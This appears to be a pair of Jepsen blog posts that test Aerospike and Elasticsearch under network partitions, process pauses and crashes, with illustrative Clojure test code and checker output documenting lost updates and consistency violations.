Previously, on Jepsen, we reviewed Elasticsearch’s progress in addressing data-loss bugs during network partitions. Today, we’ll see Aerospike, an “ACID database”, react violently to a basic partition.

Aerospike is a high-performance, distributed, schema-less, KV store, often deployed in caching, analytics, or ad tech environments. Its five-dimensional data model is similar to Bigtable or Cassandra: namespaces (databases) contain sets (tables) of records, where keys identify records. Each record is a map of bin names to values. Aerospike has put a good deal of work into performance across good-size (~100TB) datasets, and is repositioning itself as a general purpose datastore competitive with, say, MongoDB.

Data is sharded and balanced between servers using a Paxos-based membership algorithm. Stored procedures are available in Lua and allow for MapReduce-style parallel queries. There’s a lot to like here. However, Aerospike makes a dangerous assumption for a distributed datastore: it assumes the network is reliable. In this post, we’ll explore what happens in Aerospike 3.5.4 when the network is not reliable.

Availability

yes this is a real graphic a database vendor put on their homepage

Aerospike’s marketing copy delivers. The home page, for example, advertises “100% Uptime”. This makes Aerospike’s uptime infinitely better than the Ericsson AXD301 switch, which delivered somewhere between five and nine nines of availability in a system comprised of 1.1 million lines of Erlang. That this level of reliability can be obtained in a distributed database–notoriously fickle beasts–is nothing short of remarkable.

I would be delighted to use any software this dependable–but how does it work?

In the ACID architecture documentation they elaborate:

Aerospike is by and large an AP system that provides high consistency by using the following techniques:

Recall that an AP system provides total availability: every request to a non-crashed node must succeed, regardless of any disruption in the network between the nodes. How do they provide “high consistency”?

  • Trade off availability and consistency at a finer granularity in each subsystem

OK!

  • Restrict communication latencies between nodes to be sub-millisecond

Real network disruptions are usually finite in length: expect lots of short delays on the order of microseconds, a few lasting minutes, and, rarely, outages stretching on for hours or days. If your system’s characteristic latencies (e.g. timeouts) are on the order of minutes, a disruption of a few seconds won’t affect logical correctness. If, however, you consider a node dead after a millisecond, leader elections–and the chance for multiple primaries to commit conflicting data–will occur more often. On the other hand, the window for data loss might be shorter, because isolated primaries step down sooner. Tradeoffs.

  • Leverage the high vertical scale of Aerospike (1 million TPS and multiple terabyte capacity per node) to ensure that cluster sizes stay small (between 1 and 100 nodes)

Small cluster sizes do reduce the probability of seeing any partition, but in a sharded system like Aerospike, Riak, or Cassandra, the only network paths that matter are those between the n (usually 2 to 5) replicas of any given key. As the number of machines N grows, n remains constant: link failures for individual nodes affect less and less of the keyspace. What matters more is higher-order topology: top-of-rack and distribution switches–and those should usually sit between replicas in your cluster anyway to maximize availability.

In a cloud environment, most bets are off.

  • Virtually eliminate partition formation as proven by years of deployments in data center and cloud environments

As software engineers, the network is the Symplegades to our Argo, the Velociraptors in our Jurassic Park, the Aristotle Benson to our Jamie. The network decides what it’s going to allow and we’ve got to work within those bounds.

  • Ensure extremely high consistency and availability during node failures and rolling upgrades (in the absence of partitions that are rare anyway)

“Provides high consistency by … ensur[ing] extremely high consistency.”

  • Provide automatic conflict resolution to ensure newer data overrides older data during cluster formation

Fair enough. Every AP system is going to have some sort of conflict management strategy.

So, what does “high consistency” mean, exactly?

Consistency

Map of consistency models and their availability.

On the home page and throughout their white papers, Aerospike claims to offer “ACID consistency”. ANSI SQL 92 defines (sort of; you can interpret its English definitions in either “anomalous” or “strict” terms) four levels of transaction isolation, which place increasingly strong constraints on how operations from different transactions may interleave, in terms of four disallowed phenomena:

  • Read Uncommitted (prohibits P0: dirty writes)
  • Read Committed (prohibits P0 & P1: dirty reads)
  • Repeatable Read (prohibits P0, P1 & P2: fuzzy reads)
  • Serializable (prohibits P0, P1, P2, & P3: phantom reads)

… and there are also MVCC isolation models, Snapshot Isolation, Monotonic Atomic View, and so on, each with varying guarantees and different levels of availability. In the map to the right, the right hand branch shows various ACID isolation models. Purple denotes sticky-available ones, and red shows models that must sacrifice availability during a partition.

Which of these isolation levels does Aerospike support? The ACID whitepaper elaborates:

Aerospike provides read-committed isolation level using record locks to ensure isolation between multiple transactions.

Read-committed is achievable in a totally available (AP) system! It falls within the green region. So far, everything’s consistent. But the white paper goes on:

For operations on single keys with replication and secondary indexes, Aerospike provides immediate consistency using synchronous writes to replicas within the cluster, i.e., the client will be intimated about the successful write only if the replica is also updated.

And then,

After a write is completely applied and the client is notified of success, all subsequent read requests are guaranteed to find the newly written data: there is no possibility of reading stale data. Therefore, Aerospike transactions provide immediate consistency.

This suggests reads must linearize with respect to writes–and we know from the CAP theorem that linearizable systems cannot be totally available. This system must sacrifice either availability or consistency when a partition occurs. But which?

AP vs CP mode

The whitepaper helpfully includes a discussion of this tradeoff in its final section: Deployment modes – AP vs CP. The section on “CP mode” is mostly speculation, mainly because CP mode doesn’t exist.

The AP mode that Aerospike supports today prioritizes availability and therefore can be consistent only when partitions do not occur. In the future, Aerospike will add support for CP mode as an additional deployment option.

They go on to warn:

A key design point of Aerospike is to setup cluster nodes that are tightly coupled so that partitions are virtually impossible to create.

OK. So what magical network does Aerospike recommend we deploy on? The deploy page leads with Google Compute Engine and Amazon EC2, both of which have notoriously flaky networks.

Deploy to Google Compute Engine or EC2

How do you get sub-millisecond latency bounds out of EC2’s network? The Amazon Deployment Guide “recommend[s] the use of placement groups for Aerospike server instances,” i.e., you should put all your nodes in the same Availability Zone. Availability zones tend to fail dramatically every year or so, which raises the question of how we’re going to achieve that 100% uptime promised on the Aerospike home page.

To add further redundancy to Aerospike in AWS using Availability Zone (AZ), you can set up two cluster across two different availability zones such that there is one set of data in each AZ.

If you wish to configure an Aerospike cluster across two zones or regions, we suggest you use an Application-level Queue like Kafka or RabbitMQ.

Aerospike Enterprise Edition has Cross Data Center Replication (XDR) feature, which handles clusters located in multiple data centers. Please contact us for further details.

This is starting to sound less like “100% uptime with ACID consistency” than I’d hoped. Let’s put it to the test.

Linearizable CAS registers

To establish whether operations are linearizable, we’ll use a single bin in a single key as a register, and use Aerospike’s conditional writes to implement a compare-and-set register on top of that record. Our Jepsen client will handle reads, cas, and write ops by fetching the current value, performing a read+conditional-write, and an unconstrained write, respectively.
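To make the workload concrete, here’s a minimal sketch of how these operations are typically represented in a Jepsen test. This is illustrative Clojure, not necessarily the exact functions used in this analysis:

;; Generator functions producing random read, write, and compare-and-set ops
(defn r   [_ _] {:type :invoke, :f :read,  :value nil})
(defn w   [_ _] {:type :invoke, :f :write, :value (rand-int 5)})
(defn cas [_ _] {:type :invoke, :f :cas,   :value [(rand-int 5) (rand-int 5)]})

The client interprets each op: a :read fetches the bin, a :write stores a value unconditionally, and a :cas only writes if the value it just read matches the expected one.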

Then we’ll feed a mixture of randomly selected read, write, and CaS ops to that client, while interrupting the network in a 10-seconds-on, 10-seconds-off schedule, and analyze the results with Knossos to see whether they’re consistent with a linearizable history. When a client thinks a value has successfully been written, is it actually visible to others?

Inconsistent state transitions: ([{:value 4} "can't CAS 4 from 0 to 3"])
Diagram of a linearizability violation

The answer is no.

Jepsen routinely detects linearizability violations in a matter of seconds, on both read and CaS operations. For instance, this analysis follows a history where the only possible state for the register was 4, but an Aerospike client was able to execute a compare-and-set of 0 to 3. This implies both reads and conditional writes are unsafe, since the Jepsen client validates that the read value was 0 before issuing a conditional write.

In this timeline, process 6 and process 7 have pending writes of the values 2 and 4 respectively, which timed out due to a network partition. Process 11 writes 0, and that write is visible to process 12, which reads 0. Then process 4 reads 2, which means process 6’s write must have gone through.

Next, process 10 writes 4 successfully–and process 12 executes a compare-and-set from 0 to 3. This should be impossible–process 12 should have seen the most recent write of 4, not 0!

Could the value have been changed by another crashed write? No–the only other concurrent write was process 7’s write of 4, which would leave the value unchanged. This history is not consistent with a linearizable register.

We don’t even have to wait 10 seconds between network transitions. Even disruptions which resolve within a second or two are enough to induce data loss and unavailability. I expect that even millisecond-scale network disruptions would be sufficient, but Jepsen can’t control the network on that fine a timescale yet. This graph shows partitions as grey regions, and point type indicates what the Aerospike client thought happened: successful ops as +, known failed operations as x, and indeterminate ops as *.

100% available

We’re setting a timeout of 500ms here, and operations still time out every time a partition between nodes occurs. In these tests we aren’t interfering with client-server traffic at all.

Aerospike may claim “100% uptime”, but that claim is only meaningful with respect to particular latency bounds. Given that Aerospike advertises millisecond-scale latencies, you may not consider half-second timeouts “uptime”.

Counters

Linearizability is a relatively strict constraint, though. Aerospike is often deployed as an analytics datastore for high-volume things like counters. Counter increments are commutative, which makes them excellent candidates for conflict resolution! Aerospike may not be able to offer linearizability, but it might offer eventually consistent counters.

We’ll use the built-in add method from the Aerospike Java client to build a client that accepts add ops to increment a counter, and read ops to fetch the current value.
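For reference, here’s a rough interop sketch of what such a client can look like against the Aerospike Java client. The host, namespace, set, bin, and key names are illustrative assumptions, and this is not the actual test code:

(import '(com.aerospike.client AerospikeClient Key Bin)
        '(com.aerospike.client.policy Policy WritePolicy))

;; Connect to one node; "jepsen"/"counters"/"foo" are made-up names.
(def client (AerospikeClient. "n1" 3000))
(def k      (Key. "jepsen" "counters" "foo"))

(defn add! [amount]
  ;; Server-side increment of the "value" bin.
  (.add client (WritePolicy.) k (into-array Bin [(Bin. "value" (long amount))])))

(defn read-value []
  ;; Fetch the record and pull out the counter bin.
  (.getInt (.get client (Policy.) k) "value"))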

We know the true value of the counter should be at most the number of attempted increments, and at least the number of acknowledged increments. This analyzer verifies that every read overlaps with a counter value in that range–and can tell us how far out of bounds each read falls.
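The core of that check is simple. Here’s a minimal sketch of the bound test for a single read–not the actual Jepsen checker, which also has to account for increments concurrent with each read:

;; The true counter value must lie between the number of acknowledged
;; increments and the number of attempted increments.
(defn read-in-bounds? [acknowledged attempted read-value]
  (<= acknowledged read-value attempted))

(read-in-bounds? 900 1000 850)
;; => false: at least 50 acknowledged increments have gone missing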

The value of the counter falls further and further below the minimum bound with each network disruption

The (awful, I know) graph to the right shows the counter value from a typical run, plotted over something roughly analogous to time. The observed value, in orange, should lie within the blue and yellow bounds given by the number of attempted and acknowledged increments. However, as the network shifts, the counter drifts lower and lower. By the time of the final read, about 10% of the increment operations have been lost.

There’s an interesting anomaly in the middle of this graph–for a time, the observed value fluctuates between two clusters of incrementing values. This is a visible consequence of split-brain: two primary nodes both believe they are authoritative, and are processing updates and reads for significantly different values of the counter.

Just like the CaS register test, increment and read latencies will jump from ~1 millisecond to ~500 milliseconds when a partition occurs. Timeouts are not availability.

Still not 100% available

However, we may be willing to tolerate higher latencies!

If we raise the timeouts arbitrarily high (and increase the length of partitions to 10 seconds, to ensure operations can’t just block for the duration of the partition itself), Aerospike can service every request successfully, with latencies peaking at ~2 seconds. Note that fewer requests take place during partitions because Jepsen uses a fixed-concurrency test: slower response times mean fewer requests in any given interval.

Unbounded timeouts

I’d consider these very good figures for latency overall; many systems have characteristic recovery times on the order of 60 seconds, not 2 seconds! I think Aerospike deserves a round of applause here.

Conflict resolution

A CRDT like a PN-counter wouldn’t show this type of behavior. Although read values would drop below bounds temporarily (in the scope of a partition), when the partition resolved, the PN-counter’s merge function would recombine the increments from both sides and we’d read a value within bounds.

Aerospike’s counter behavior is characteristically different: it may be eventually consistent in that clients agree on a value, but it’s not the value we want. The damage is done, so to speak. Why?

At a later point, if the factions rejoin, data that has been written in both factions will be detected as inconsistent. Two policies may be followed. Either Aerospike will auto-merge the two data items (default behavior today) or keep both copies for application to merge later (future). Auto merge works as follows:

  • TTL (time-to-live) based: The record with the highest TTL wins
  • Generation based: The record with the highest generation win

Using the generation number preserves the record that has gone through the most changes since divergence. In the diagram below, a register containing a, with generation 0, is split by a network partition. The lower replica accepts two writes of b and c, respectively, making its generation 2. The upper replica then accepts a single write of d, and has generation 1. Since the lower replica containing c underwent more changes, it wins, clobbering the subsequent write of d.

Generation vs TTL conflict resolution

In TTL-based conflict resolution, the version with the higher Time To Live wins. It’s not clear to me whether Aerospike uses the size of the TTL or the time the record is supposed to expire, but both are inconsistent: an earlier write can clobber a later one if its TTL happens to be higher, if its node’s clock is misaligned, and so on. If the TTLs are equal, the best Aerospike can do is fall back to generation-based conflict resolution. And if the generations are equal too? It’s a coin flip.
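A rough sketch of these two policies–illustrative Clojure, not Aerospike’s implementation–makes the problem plain: whichever copy loses is simply discarded, along with every update it contained.

;; Pick a winner by generation or by TTL; the losing copy's updates vanish.
(defn merge-by-generation [a b] (max-key :generation a b))
(defn merge-by-ttl        [a b] (max-key :ttl a b))

(merge-by-generation {:value "c" :generation 2}
                     {:value "d" :generation 1})
;; => {:value "c", :generation 2}  ; the later write of d is clobbered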

There’s no way for these strategies to not lose updates. I asked Aerospike’s support about the data-loss issues I saw in my tests, and they recommended using the generation policy for counters and TTL resolution for “idempotent changes”. In my tests, both conflict resolution strategies resulted in identical data-loss patterns.

LOST UPDATES
Nope nope nope nope

Lost updates (and related anomalies in Aerospike) invalidate its claims to every ACID isolation level. We’re not just talking about the temporary visibility of garbage data–we’re talking about accepting updates that never should have happened in the first place, like claiming a unique ID twice, or double-withdrawing a balance.

So long as Aerospike automatically merges data in this way, we can’t avoid write loss. But we can take advantage of a feature called “application merge”, which, like Riak or CouchDB, presents divergent versions of a record to the client for conflict resolution. From the ACID whitepaper:

Application merge works as follows:

  • When two versions of the same data item are available in the cluster, a read of this value will return both versions, allowing the application to resolve the inconsistency.
  • The client application – the only entity with knowledge of how to resolve these differences – must then re-write the data in a consistent fashion.
Sister Monoid, of the Sisters of Partitional Indulgence

If our merge function is associative and commutative, we obtain a structure called a commutative monoid, which frees us from having to care about which side performed updates in which order. We can simply mash all the updates together any which way and get the same result. However, this isn’t enough! We don’t have just a list of updates–we only have the merged result of two possibly intersecting sets of updates on two different replicas. A normal merge would double-count operations common to both histories.

We have to add a third property: idempotence. merge(merge(x, y), y) should be the same as merge(x, y). If our merge function is associative, commutative, and idempotent, we obtain what’s called a CRDT, or Commutative Replicated Datatype. CRDTs ensure that reads eventually converge on a least upper bound for all past operations. No updates lost, nothing double-counted. We still have the possibility of stale reads, but they’ll eventually converge on the right value.
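As a concrete example, here’s a minimal grow-only counter sketch (node names assumed for illustration). Its merge is associative, commutative, and idempotent, so replicas can be combined in any order, any number of times, without losing or double-counting increments:

;; Each replica tracks a map of node -> number of increments seen on that node.
(defn increment [counter node]
  (update-in counter [node] (fnil inc 0)))

;; Merging takes the per-node maximum, so re-merging the same state is a no-op.
(defn merge-counters [a b]
  (merge-with max a b))

(defn counter-value [counter]
  (reduce + 0 (vals counter)))

(let [a (-> {} (increment :n1) (increment :n1)) ; two increments on one side
      b (-> {} (increment :n2))]                ; one increment on the other
  (counter-value (merge-counters (merge-counters a b) b)))
;; => 3: merging b a second time changes nothing (idempotence)

A PN-counter extends this with a second map for decrements, merged the same way.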

So, let’s test it! We’ll just google for “aerospike application merge” to figure out where this feature lives, and find this question on the Aerospike forums:

“Wanted to know if Application based merge still works?”

Currently, TTL and generation are still the only 2 options available for handling conflict.

Like CP mode, this important safety feature does not actually exist.

Recommendations

Aerospike offers phenomenal latencies and throughput–but in terms of data safety, its strongest guarantees are similar to Cassandra or Riak in Last-Write-Wins mode. It may be a safe store for immutable data, but updates to a record can be silently discarded in the event of network disruption. Because Aerospike’s timeouts are so aggressive–on the order of milliseconds–even small network hiccups are sufficient to trigger data loss.

If you are an Aerospike user, you should not expect “immediate”, “read-committed”, or “ACID consistency”; their marketing material quietly assumes you have a magical network, and I assure you this is not the case. It’s certainly not true in cloud environments, and even well-managed physical datacenters can experience horrible network failures.

Aerospike delivers millisecond-scale latencies when healthy, but even small network hiccups can cause timeouts. This is not particularly surprising–most AP systems go briefly unavailable (or equivalently, have much higher latencies) while converging on a new state when the network changes, but you should keep it in mind: “100% uptime” probably won’t hold through network failure if you demand responses within 50 or even 500 ms. If you’re willing to wait a few seconds for requests, though, Aerospike appears to satisfy.

To be read in the voice of Ruby Rhod

Aerospike uses a Paxos implementation as a part of their membership algorithm, so they’re clearly no strangers to consensus systems. I asked whether they planned to address these problems by threading writes through their Paxos implementation, and they responded that this would impose unacceptable overhead for their latency-sensitive customers.

Aerospike synchronously replicates to all replicas by default, whereas majority-quorum Paxos variants only require acknowledgement from a majority, so on paper using Paxos could actually improve performance–but the extra state machinery required might outweigh the latency savings. Or their particular Paxos implementation may require more rounds. That’s a balance they’ll have to explore!

Keep in mind that even if Aerospike doesn’t use Paxos for their writes, write loss may be tolerable! Many ad tech systems process millions of requests per second, and losing data for a tenth of those over a few minutes might mean nothing to their bottom line. What does cost money is serving ads slower than one’s competitors–so a system like Aerospike could be a perfect fit. The same goes for many analytics stores–so long as the cluster is healthy more often than not, lost increments can wash out in the noise. Most caches tolerate lost updates just fine.

Bottom line: consider Aerospike as a high-volume, lossy key-value store, not as a source of record for high-value mutable data.

Stripe

This work is a part of my research at Stripe, and I would like to thank everyone there–especially Marc Hedlund–for helping me test distributed systems and publish articles like this. I’d like to thank Lucien Volmar, Kevin Porter, and Peter Corless from Aerospike for their help in getting the cluster set up and evaluating test results. Finally, my thanks to Caitie McCaffrey, Duretti Hirpa, Coda Hale, and Inés Sombra for their very helpful comments.

Previously, on Jepsen, we demonstrated stale and dirty reads in MongoDB. In this post, we return to Elasticsearch, which loses data when the network fails, nodes pause, or processes crash.

Nine months ago, in June 2014, we saw Elasticsearch lose both updates and inserted documents during transitive, nontransitive, and even single-node network partitions. Since then, folks continue to refer to the post, often asking whether the problems it discussed are still issues in Elasticsearch. The response from Elastic employees is often something like this:

"Not a major problem"

In this Jepsen post, I’d like to follow up on Elastic’s reaction to the first post, how they’ve addressed the bugs we discussed, and what data-loss scenarios remain. Most of these behaviors are now documented, so this is mainly a courtesy for users who requested a followup post. Cheers!

Reactions

The initial response from Elasticsearch was somewhat muted. Elasticsearch’s documentation remained essentially unchanged for months, and like Datastax with the Cassandra post, the company made no mention of the new findings in their mailing list or blog.

However, Elastic continued to make progress internally. Around September they released a terrific page detailing all known data-loss and consistency problems in Elasticsearch, with links to relevant tickets, simple explanations of the cause for each bug, and descriptions of the possible consequences. This documentation is exactly the kind of resource you need when evaluating a new datastore, and I’d like to encourage every database vendor to publish a similar overview. I would like to see Elasticsearch reference known failure modes in the documentation for particular features–for instance, Optimistic Concurrency Control could mention that version checks are not guaranteed to actually work: your update could be lost or misapplied–but the addition of a failure-modes page is a dramatic improvement and deserves congratulation!

Moreover, the resiliency page provides official confirmation that Elastic is using Jepsen internally to replicate this work and help improve their safety guarantees, in addition to expanding their integrated tests for failure scenarios.

Elastic has previously expressed that they’d prefer to design their own consensus system (ZenDisco) instead of re-using an existing one. All the issues we discussed in the last Elasticsearch post essentially stem from that decision–and I was hoping that they might choose to abandon ZenDisco in favor of a proven algorithm. That hasn’t happened yet, but Elastic did land a massive series of patches and improvements to ZenDisco, and closed the intersecting-partitions split-brain ticket on September first, 2014. The fixes appeared definitive:

It's fixed now.

And as folks referenced the previous Jepsen post on Twitter, I noticed a common response from Elasticsearch users: because the ticket is closed, we can safely assume that Elasticsearch no longer loses data in network partitions. Elasticsearch’s resiliency page is very clear that this is not the case: ES currently fails their Jepsen tests and is still known to lose documents during a network partition.

So, is the intersecting-network-partitions-causing-split-brain bug fixed? Or are these problems still extant, and if so, how bad are they? I’ve updated the Jepsen tests for Elasticsearch to test the same scenarios on version 1.5.0.

Intersecting partitions

In this test, we insert a stream of documents, each containing a distinct integer, into a five-node Elasticsearch cluster. Meanwhile, we cut the network in half, but leave one node visible to both components. I’ve called this a “bridge”, or “nontransitive” partition, and the ticket refers to it as “partial” or “intersecting”–same topology in all cases. In version 1.1.0, this test caused Elasticsearch to elect a stable primary node on both sides of the partition (with the node in the middle considering itself a part of both clusters) for the entire duration of the partition. When the network healed, one primary would overwrite the other, losing about half of the documents written during the partition.
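For the curious, Jepsen ships a nemesis for this topology. A sketch along these lines (assuming the jepsen.nemesis namespace; the actual test code may differ):

(require '[jepsen.nemesis :as nemesis])

;; Cut the cluster into two halves, but keep one randomly chosen node
;; connected to both sides.
(def bridge-nemesis
  (nemesis/partitioner (comp nemesis/bridge shuffle)))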

With the improvements to ZenDisco, the window for split-brain is significantly shorter. After about 90 seconds, Elasticsearch correctly elects a single primary, instead of letting two run concurrently. The new tests only show the loss of a few acknowledged documents, usually in a window of a few seconds around the start of a partition. In this case, 22 documents were successfully inserted, then discarded by Elasticsearch.

{:valid? false, :lost "#{795 801 809 813..815 822..827 830 832..833 837 839..840 843..846}", :recovered "#{46 49..50 251 255 271..272 289 292 308..309 329 345 362 365 382..383 435 445 447..448 453..455 459 464 478..479 493 499 517 519 526 529 540 546..547 582 586 590 605 610 618 621 623 626 628 631 636 641 643 646 651 653 656 658 661 663 668 671 673 676 678 681 683 686 691 693 696 698 703 708 710 714..715 718 720 729 748 753}", :ok "#{0..46 49..51 54..67 70..85 88..104 106 108..123 126..141 143 145..159 161..162 164..178 180 182..196 199..214 216..217 219..233 236..325 327..345 347..420 422 424..435 437 441..442 445 447..448 450 452..455 459 461 463..471 473 476..480 483..494 498..502 506..510 512 516..520 523 526 529..530 532 536..542 545..549 552..560 566 568..570 572 575..576 578..579 582..586 590..595 600 604..605 610 612 618 621 623 626 628 631 636 641 643 646 651 653 656 658 661 663 668 671 673 676 678 681 683 686 691 693 696 698 703 708 710 714..715 718 720 729 748 753}", :recovered-frac 80/897, :unexpected-frac 0, :unexpected "#{}", :lost-frac 22/897, :ok-frac 553/897}

The root ticket here is probably 7572: A network partition can cause in flight documents to be lost, which was opened only a couple days after Mr. Leskes closed the intersecting-partitions ticket as solved. The window for split-brain is significantly shorter with the new patches, but the behavior of losing documents during this type of partition still exists despite the ticket being closed.

Expect delays

I touched on this in the previous post, but I’d like to restate: electing a new primary in Elasticsearch continues to be an expensive process. Because of that 90-second hardcoded timeout, no matter how low you set the failure detection timeouts and broadcast intervals, Elasticsearch will go globally unavailable for writes for a minute and a half when a network partition isolates a primary.

Latency graph

Shaded regions indicate when a network partition has isolated a primary node. + indicates a successful insert, and * shows a crashed update which may or may not have succeeded. Jepsen imposes a hard five-second timeout on all inserts, which forms the upper bound to the graph. Note that every operation times out for 90 seconds after a partition begins.

Because each of the five clients in this test is talking to a distinct node in the cluster, we can see partial availability in the steady state–clients talking to the isolated primary continue to time out, and clients talking to the majority component resume operations once that component elects a new primary.

Isolated primaries

One of the new bugs I discovered in Elasticsearch during the last round of Jepsen was that it would lose data not only during nontransitive partitions, but also during partitions which cut the network into two completely connected, isolated components–or which isolated just a single node. Either could induce the loss of dozens of documents.

That bug is unaffected by the changes to ZenDisco in 1.5.0. In this particular run, isolating only primary nodes from the rest of the cluster could cause almost a quarter of acknowledged documents to be lost.

{:valid? false, :lost "#{471..473 546..548 551..565 567..568 570..584 586 588..602 604 606..621 623 625..639 641..642 644..658 660 662..676 678 680..694 696 698..712 714..715 717..731 733 735..750 752 754..768 770 772..777}", :recovered "#{49..50 58 79..82 84..87 89..92 94..97 99..102 104..107 109..112 114..123 128 149 170 195 217 241 264 298 332..333 335 337..338 340 342..345 347..350 352..353 355..356 358..361 363..366 368..371 373..375 378..381 383..386 388..391 810 812 817 820 825 830 834..835 837 839..840 842 844..845 847 849..850 852 854..855 857 859..860 862 864..867 869..872 874..877 879 881 913 932}", :ok "#{0..53 58 79..82 84..87 89..92 94..97 99..102 104..107 109..112 114..299 301 332..333 335 337..338 340 342..345 347..350 352..353 355..356 358..361 363..366 368..371 373..376 378..381 383..386 388..391 393..405 407..428 430..450 452..470 810 812 817 820 825 830 834..835 837 839..840 842 844..845 847 849..850 852 854..855 857 859..860 862 864..867 869..872 874..877 879..882 884..895 897..902 904..919 921..939 941..946}", :recovered-frac 134/947, :unexpected-frac 0, :unexpected "#{}", :lost-frac 209/947, :ok-frac 490/947}

This is not a transient blip for in-flight docs–the window of data loss extends for about 90 seconds, which is, coincidentally, one of the hard-coded timeouts in electing a new primary.

I’ve opened 10406 for this problem, because it’s also a split-brain issue. For several seconds, Elasticsearch is happy to believe two nodes in the same cluster are both primaries, will accept writes on both of those nodes, and later discard the writes to one side.

Sometimes the cluster never recovers from this type of partition, and hangs until you do a rolling restart. Wooooooo!

GC pauses

One of the things Elasticsearch users complain about is garbage collection-induced split-brain. This isn’t documented as something that can cause data loss on the resiliency page, so I’ve written a test which uses SIGSTOP and SIGCONT to pause a random primary process, simulating a long garbage-collection cycle, swap pressure, or an IO scheduler hiccup.
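The pause itself is just signals. A minimal sketch using Jepsen’s remote-execution helpers–assuming jepsen.control’s on/su/exec, and that each node runs a single java process; not the exact test code:

(require '[jepsen.control :as c])

;; Freeze and thaw the Elasticsearch JVM on a node, simulating a long GC pause.
(defn pause!  [node] (c/on node (c/su (c/exec :killall :-s "STOP" "java"))))
(defn resume! [node] (c/on node (c/su (c/exec :killall :-s "CONT" "java"))))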

This causes Elasticsearch to lose data as well. Since the paused node isn’t executing any requests while it’s stuck, it doesn’t have the opportunity to diverge significantly from its peers–but when it wakes up, it’s happy to process an in-flight write as if it were still the legal primary, not realizing that it’s been superseded by an election while it was asleep. That can cause the loss of a few in-flight documents.

Repeated pauses, like you might see in a swapping system, a node under severe memory pressure, or one with a faulty disk, can result in more catastrophic data loss–in this case, ~9.3% of 2143 acknowledged documents were actually lost.

{:valid? false, :lost "#{1794 1803..1806 1808..1809 1811..1812 1817 1819..1820 1823 1828 1830 1832..1835 1837..1838 1841..1845 1847 1849 1851 1854..1856 1859 1861..1863 1865..1868 1871 1873 1875 1877 1879 1881..1882 1886..1889 1891 1894..1897 1900..1902 1904..1907 1909 1911..1912 1917..1919 1925 1927..1928 1931..1936 1938 1941..1943 1945 1947..1951 1953..1954 1956..1957 1959..1962 1964..1966 1970..1971 1973..1974 1977..1978 1980 1982 1986..1987 1989..1990 1992..1994 1998..1999 2001 2003 2007..2008 2010 2012 2014..2021 2023..2025 2031..2034 2039 2044 2046..2048 2050 2053..2057 2060..2062 2064..2068 2073..2075 2077..2078 2081..2082 2084..2087 2089..2090 2092 2094 2097..2098 2100 2102..2103 2107 2110 2112..2114 2116..2123 2127 2130..2134 2136 2138..2139 2141..2142}", :recovered "#{0 9 26 51 72 96 118 141 163 187 208 233 254 278 300 323 346 370 393 435 460 481 505 527 552 573 598 621 644 668 691 715 737 761 783 806 829 851 891 906 928 952 977 998 1022 1044 1069 1090 1113 1136 1159 1182 1204 1228 1251 1275 1298 1342..1344 1348 1371 1416 1438 1460 1484 1553 1576 1598 1622 1668 1692 1714 1736 1783..1784 1786..1787 1790..1792 1795..1797 1807 1852 1876 1898 1922 1967 1991 2105}", :ok "#{0..1391 1393..1506 1508..1529 1531..1644 1646..1779 1783..1784 1786..1788 1790..1793 1795..1802 1807 1810 1813..1816 1818 1821..1822 1824..1827 1831 1836 1839..1840 1846 1848 1850 1852..1853 1857..1858 1860 1864 1869..1870 1872 1874 1876 1878 1880 1883..1885 1890 1892..1893 1898..1899 1903 1908 1910 1913..1916 1920..1924 1926 1929..1930 1937 1939..1940 1944 1952 1955 1958 1963 1967..1969 1972 1975..1976 1979 1981 1983..1985 1988 1991 1995..1997 2000 2002 2004..2006 2009 2011 2022 2026..2030 2035..2036 2038 2040..2043 2045 2049 2051..2052 2058 2063 2069..2072 2076 2079..2080 2088 2091 2093 2095..2096 2099 2101 2104..2106 2108..2109 2111 2115 2124..2126 2128 2135 2137 2140}", :recovered-frac 92/2143, :unexpected-frac 0, :unexpected "#{}", :lost-frac 200/2143, :ok-frac 1927/2143}

These sorts of issues are endemic to systems like ZenDisco which use failure detectors to pick authoritative primaries without threading the writes themselves through a consensus algorithm. The two must be designed in tandem.

Elastic is taking the first steps towards a consensus algorithm by introducing sequence numbers on writes. Like Viewstamped Replication and Raft, operations will be identified by a monotonic [term, counter] tuple. Coupling those sequence numbers to the election and replication algorithms is tricky to do correctly, but Raft and VR lay out a roadmap for Elasticsearch to follow, and I’m optimistic they’ll improve with each release.

I’ve opened a ticket for pause-related data loss, mostly as a paper trail–Elastic’s engineers and I both suspect 7572, related to the lack of a consensus algorithm for writes, covers this as well. Initially Elastic thought this might be due to a race condition in index creation, so Lee Hinman (Dakrone) helped improve the test so it verified the index status before starting. That index-creation problem can also cause data loss, but it’s not the sole factor in this Jepsen test–even with these changes, Elasticsearch still loses documents when nodes pause.

{:valid? false, :lost "#{1761}", :recovered "#{0 2..3 8 30 51 73 97 119 141 165 187 211 233 257 279 302 324 348 371 394 436 457 482 504 527 550 572 597 619 642 664 688 711 734 758 781 804 827 850 894 911 934 957 979 1003 1025 1049 1071 1092 1117 1138 1163 1185 1208 1230 1253 1277 1299 1342 1344 1350 1372 1415 1439 1462 1485 1508 1553 1576 1599 1623 1645 1667 1690 1714 1736 1779 1803 1825 1848 1871 1893 1917 1939 1964 1985 2010 2031 2054 2077 2100 2123 2146 2169 2192}", :ok "#{0..1344 1346..1392 1394..1530 1532..1760 1762..2203}", :recovered-frac 24/551, :unexpected-frac 0, :unexpected "#{}", :lost-frac 1/2204, :ok-frac 550/551}

Crashed nodes

You might assume, based on the Elasticsearch product overview, that Elasticsearch writes to the transaction log before confirming a write.

Elasticsearch puts your data safety first. Document changes are recorded in transaction logs on multiple nodes in the cluster to minimize the chance of any data loss.

I’d like to draw your attention to a corner of the Elasticsearch documentation you may not have noticed: the translog config settings, which notes:

index.gateway.local.sync

How often the translog is fsynced to disk. Defaults to 5s.

To be precise, Elasticsearch’s transaction log does not put your data safety first. It puts it anywhere from zero to five seconds later.

In this test we kill random Elasticsearch processes with kill -9 and restart them. In a datastore like Zookeeper, Postgres, BerkeleyDB, SQLite, or MySQL, this is safe: transactions are written to the transaction log and fsynced before acknowledgement. In Mongo, the fsync flags ensure this property as well. In Elasticsearch, write acknowledgement takes place before the transaction is flushed to disk, which means you can lose up to five seconds of writes by default. In this particular run, ES lost about 10% of acknowledged writes.

